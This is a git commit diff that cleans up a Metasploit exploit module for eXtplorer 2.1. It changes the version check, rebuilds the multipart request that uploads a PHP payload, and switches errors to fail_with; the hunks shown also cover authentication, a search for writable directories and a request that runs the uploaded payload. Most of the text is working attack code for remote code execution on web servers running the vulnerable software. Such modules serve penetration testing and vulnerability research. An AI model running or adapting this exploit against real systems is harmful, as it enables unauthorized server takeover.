extplorer_upload_exec cleanup
parent
8f91352c4a
commit
52157b9124
|
@ -30,16 +30,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '88751' ],
|
||||
[ 'BID', '57058' ],
|
||||
[ 'URL', 'http://itsecuritysolutions.org/2012-12-31-eXtplorer-v2.1-authentication-bypass-vulnerability' ],
|
||||
[ 'URL', 'http://extplorer.net/issues/105' ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00"
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'ExitFunction' => "none"
|
||||
},
|
||||
'Platform' => 'php',
|
||||
'Arch' => ARCH_PHP,
|
||||
|
@ -71,9 +68,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'uri' => "#{base}extplorer.xml"
|
||||
})
|
||||
|
||||
return Exploit::CheckCode::Vulnerable if res and res.code == 200 and res.body =~ /<version>2\.1\.(0RC5|0|1|2)<\/version>/
|
||||
return Exploit::CheckCode::Detected if res and res.code == 200 and res.body =~ /eXtplorer/
|
||||
if !res or res.code != 200
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
if res.body =~ /<version>2\.1\.0RC[012]<\/version>/
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
if res.body =~ /eXtplorer/
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
print_error("#{peer} - Connection failed")
|
||||
end
|
||||
|
@ -92,29 +98,22 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def upload(base, dir, fname, file)
|
||||
|
||||
boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(10)}"
|
||||
data_post = "--#{boundary}\r\n"
|
||||
data_post << "Content-Disposition: form-data; name=\"userfile[0]\"; filename=\"#{fname}\"\r\n"
|
||||
data_post << "Content-Type: application/x-httpd-php\r\n"
|
||||
data_post << "\r\n#{file}\r\n"
|
||||
data_post << "--#{boundary}\r\n"
|
||||
data_post << "Content-Disposition: form-data; name=\"overwrite_files\"\r\n\r\non\r\n"
|
||||
data_post << "--#{boundary}\r\n"
|
||||
data_post << "Content-Disposition: form-data; name=\"dir\"\r\n\r\n%2f#{dir}\r\n"
|
||||
data_post << "--#{boundary}\r\n"
|
||||
data_post << "Content-Disposition: form-data; name=\"option\"\r\n\r\ncom_extplorer\r\n"
|
||||
data_post << "--#{boundary}\r\n"
|
||||
data_post << "Content-Disposition: form-data; name=\"action\"\r\n\r\nupload\r\n"
|
||||
data_post << "--#{boundary}\r\n"
|
||||
data_post << "Content-Disposition: form-data; name=\"requestType\"\r\n\r\nxmlhttprequest\r\n"
|
||||
data_post << "--#{boundary}\r\n"
|
||||
data_post << "Content-Disposition: form-data; name=\"confirm\"\r\n\r\ntrue\r\n"
|
||||
data_post << "--#{boundary}\r\n"
|
||||
data = Rex::MIME::Message.new
|
||||
data.add_part(file, 'application/x-httpd-php', nil, "form-data; name=\"userfile[0]\"; filename=\"#{fname}\"")
|
||||
data.add_part("on", nil, nil, "form-data; name=\"overwrite_files\"")
|
||||
data.add_part("%2f#{dir}", nil, nil, "form-data; name=\"dir\"")
|
||||
data.add_part("com_extplorer", nil, nil, "form-data; name=\"option\"")
|
||||
data.add_part("upload", nil, nil, "form-data; name=\"action\"")
|
||||
data.add_part("xmlhttprequest", nil, nil, "form-data; name=\"requestType\"")
|
||||
data.add_part("true", nil, nil, "form-data; name=\"confirm\"")
|
||||
|
||||
data_post = data.to_s
|
||||
data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => "#{base}index.php",
|
||||
'ctype' => "multipart/form-data; boundary=#{boundary}",
|
||||
'ctype' => "multipart/form-data; boundary=#{data.bound}",
|
||||
'data' => data_post,
|
||||
'cookie' => datastore['COOKIE'],
|
||||
})
|
||||
|
@ -149,8 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
if res and res.code == 200 and res.body =~ /Are you sure you want to delete these/
|
||||
print_status("#{@peer} - Authenticated successfully")
|
||||
else
|
||||
print_error("#{@peer} - Authentication failed")
|
||||
return
|
||||
fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed")
|
||||
end
|
||||
|
||||
# search for writable directories
|
||||
|
@ -163,8 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'data' => "option=com_extplorer&action=getdircontents&dir=#{base}&sendWhat=dirs&node=ext_root",
|
||||
})
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
print_error("#{@peer} - Connection failed")
|
||||
return
|
||||
fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
|
||||
end
|
||||
if res and res.code == 200 and res.body =~ /\{'text':'([^']+)'[^\}]+'is_writable':true/
|
||||
dir = "#{base}#{$1}"
|
||||
|
@ -182,12 +179,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
if res and res.code == 200 and res.body =~ /'message':'Upload successful\!'/
|
||||
print_good("#{@peer} - File uploaded successfully")
|
||||
else
|
||||
print_error("#{@peer} - Uploading PHP payload failed")
|
||||
return
|
||||
fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed")
|
||||
end
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
print_error("#{@peer} - Connection failed")
|
||||
return
|
||||
fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
|
||||
end
|
||||
|
||||
# search directories in the web root for the file
|
||||
|
@ -200,8 +195,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'cookie' => datastore['COOKIE'],
|
||||
})
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
print_error("#{@peer} - Connection failed")
|
||||
return
|
||||
fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
|
||||
end
|
||||
if res and res.code == 200 and res.body =~ /'dir':'\\\/([^']+)'/
|
||||
dir = $1.gsub('\\','')
|
||||
|
@ -218,8 +212,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'uri' => "/#{dir}/#{@fname}"
|
||||
})
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
print_error("#{@peer} - Connection failed")
|
||||
return
|
||||
fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
|
||||
end
|
||||
if res and res.code != 200
|
||||
print_error("#{@peer} - Executing payload failed")
|
||||
|
|
Loading…
Reference in New Issue